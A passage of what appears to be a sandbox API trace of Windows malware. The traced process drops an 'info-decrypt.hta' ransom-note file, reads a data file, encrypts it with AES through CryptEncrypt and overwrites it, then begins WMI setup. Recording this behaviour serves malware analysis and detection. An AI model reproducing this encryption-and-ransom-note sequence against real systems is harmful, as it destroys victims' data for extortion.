(in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0197.495] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0197.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0197.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0197.496] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Connections", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Connections", lpFilePart=0x0) returned 0x2c [0197.496] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Connections\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Connections\\", lpFilePart=0x0) returned 0x2d [0197.496] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.496] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.496] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0197.497] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0197.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0197.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0197.497] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Connections", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Connections", lpFilePart=0x0) returned 0x2c [0197.497] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Connections\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Connections\\", lpFilePart=0x0) returned 0x2d [0197.497] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.497] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.498] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0197.498] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0197.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0197.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0197.498] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader", lpFilePart=0x0) returned 0x2b [0197.498] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\", lpFilePart=0x0) returned 0x2c [0197.498] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.499] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.499] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xe0118910, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0197.499] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0197.499] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0197.499] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0197.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0197.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0197.500] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader", lpFilePart=0x0) returned 0x2b [0197.500] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\", lpFilePart=0x0) returned 0x2c [0197.500] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.500] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.500] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xe0118910, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0197.501] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0197.501] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 0 [0197.501] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0197.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0197.501] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", nBufferLength=0x105, lpBuffer=0x691ee50, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", lpFilePart=0x0) returned 0x35 [0197.501] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\info-decrypt.hta", lpFilePart=0x0) returned 0x3c [0197.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b8) returned 1 [0197.502] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f334 | out: lpFileInformation=0x691f334*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0197.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b4) returned 1 [0197.502] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", nBufferLength=0x105, lpBuffer=0x691ee50, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", lpFilePart=0x0) returned 0x35 [0197.502] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ecf8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\info-decrypt.hta", lpFilePart=0x0) returned 0x3c [0197.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1ec) returned 1 [0197.502] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0197.503] GetFileType (hFile=0x324) returned 0x1 [0197.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e8) returned 1 [0197.503] GetFileType (hFile=0x324) returned 0x1 [0197.503] WriteFile (in: hFile=0x324, lpBuffer=0x37da040*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f2b0, lpOverlapped=0x0 | out: lpBuffer=0x37da040*, lpNumberOfBytesWritten=0x691f2b0*=0x1000, lpOverlapped=0x0) returned 1 [0197.504] WriteFile (in: hFile=0x324, lpBuffer=0x37da040*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f284, lpOverlapped=0x0 | out: lpBuffer=0x37da040*, lpNumberOfBytesWritten=0x691f284*=0x55e, lpOverlapped=0x0) returned 1 [0197.504] CloseHandle (hObject=0x324) returned 1 [0197.505] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", nBufferLength=0x105, lpBuffer=0x691ee58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", lpFilePart=0x0) returned 0x35 [0197.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f304) returned 1 [0197.505] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), fInfoLevelId=0x0, lpFileInformation=0x37db05c | out: lpFileInformation=0x37db05c*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xe0118910, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000)) returned 1 [0197.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f300) returned 1 [0197.505] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", nBufferLength=0x105, lpBuffer=0x691ed44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", lpFilePart=0x0) returned 0x35 [0197.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f238) returned 1 [0197.506] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0197.506] GetFileType (hFile=0x324) returned 0x1 [0197.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f234) returned 1 [0197.506] GetFileType (hFile=0x324) returned 0x1 [0197.506] GetFileSize (in: hFile=0x324, lpFileSizeHigh=0x691f340 | out: lpFileSizeHigh=0x691f340*=0x0) returned 0x400000 [0197.636] ReadFile (in: hFile=0x324, lpBuffer=0x7ad5b50, nNumberOfBytesToRead=0x400000, lpNumberOfBytesRead=0x691f2ec, lpOverlapped=0x0 | out: lpBuffer=0x7ad5b50*, lpNumberOfBytesRead=0x691f2ec*=0x400000, lpOverlapped=0x0) returned 1 [0198.093] CloseHandle (hObject=0x324) returned 1 [0198.094] CryptAcquireContextW (in: phProv=0x691f28c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f28c*=0x66bc258) returned 1 [0198.095] CryptGenRandom (in: hProv=0x66bc258, dwLen=0x10, pbBuffer=0x373486c | out: pbBuffer=0x373486c) returned 1 [0198.721] CryptImportKey (in: hProv=0x66bc258, pbData=0x37406cc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f25c | out: phKey=0x691f25c*=0xb7f710) returned 1 [0198.721] CryptContextAddRef (hProv=0x66bc258, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.721] CryptContextAddRef (hProv=0x66bc258, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.722] CryptDuplicateKey (in: hKey=0xb7f710, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f24c | out: phKey=0x691f24c*=0xb7f850) returned 1 [0198.722] CryptContextAddRef (hProv=0x66bc258, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.722] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x4, pbData=0x37407ac*=0x1, dwFlags=0x0) returned 1 [0198.722] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x1, pbData=0x3740778, dwFlags=0x0) returned 1 [0198.816] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8854f80*, pdwDataLen=0x691f2b8*=0x400010, dwBufLen=0x400010 | out: pbData=0x8854f80*, pdwDataLen=0x691f2b8*=0x400010) returned 1 [0198.919] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37407d4*, pdwDataLen=0x691f2c0*=0x0, dwBufLen=0x10 | out: pbData=0x37407d4*, pdwDataLen=0x691f2c0*=0x10) returned 1 [0198.920] CryptDestroyKey (hKey=0xb7f710) returned 1 [0198.920] CryptReleaseContext (hProv=0x66bc258, dwFlags=0x0) returned 1 [0198.920] CryptReleaseContext (hProv=0x66bc258, dwFlags=0x0) returned 1 [0198.920] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", nBufferLength=0x105, lpBuffer=0x691ed30, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", lpFilePart=0x0) returned 0x35 [0198.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f224) returned 1 [0198.920] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0198.921] GetFileType (hFile=0x4e0) returned 0x1 [0198.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f220) returned 1 [0198.921] GetFileType (hFile=0x4e0) returned 0x1 [0198.921] WriteFile (in: hFile=0x4e0, lpBuffer=0x3740dd0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f2b4, lpOverlapped=0x0 | out: lpBuffer=0x3740dd0*, lpNumberOfBytesWritten=0x691f2b4*=0x20, lpOverlapped=0x0) returned 1 [0198.922] CloseHandle (hObject=0x4e0) returned 1 [0198.922] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0198.922] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0198.923] CoTaskMemFree (pv=0xbed438) [0198.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0198.923] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f260 | out: ppv=0x691f260*=0xb51e34) returned 0x0 [0198.923] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f258 | out: pAptType=0x691f258*=1) returned 0x0 [0198.923] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f25c | out: ppvObject=0x691f25c*=0x0) returned 0x80004002 [0198.923] IUnknown:Release (This=0xb51e34) returned 0x1 [0198.924] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ebc8 | out: ppv=0x691ebc8*=0x60276e0) returned 0x0 [0198.924] WbemDefPath:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ede0 | out: ppvObject=0x691ede0*=0x0) returned 0x80004002 [0198.924] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60276e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edf4 | out: ppvObject=0x691edf4*=0x60314a0) returned 0x0 [0198.924] WbemDefPath:IUnknown:Release (This=0x60276e0) returned 0x0 [0198.924] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea14 | out: ppvObject=0x691ea14*=0x60314a0) returned 0x0 [0198.924] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e9d0 | out: ppvObject=0x691e9d0*=0x0) returned 0x80004002 [0198.924] WbemDefPath:IUnknown:AddRef (This=0x60314a0) returned 0x3 [0198.924] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0198.924] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e2dc | out: ppvObject=0x691e2dc*=0x0) returned 0x80004002 [0198.924] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e2e8 | out: ppvObject=0x691e2e8*=0x66ccd78) returned 0x0 [0198.924] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccd78, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e2f0 | out: pCid=0x691e2f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, 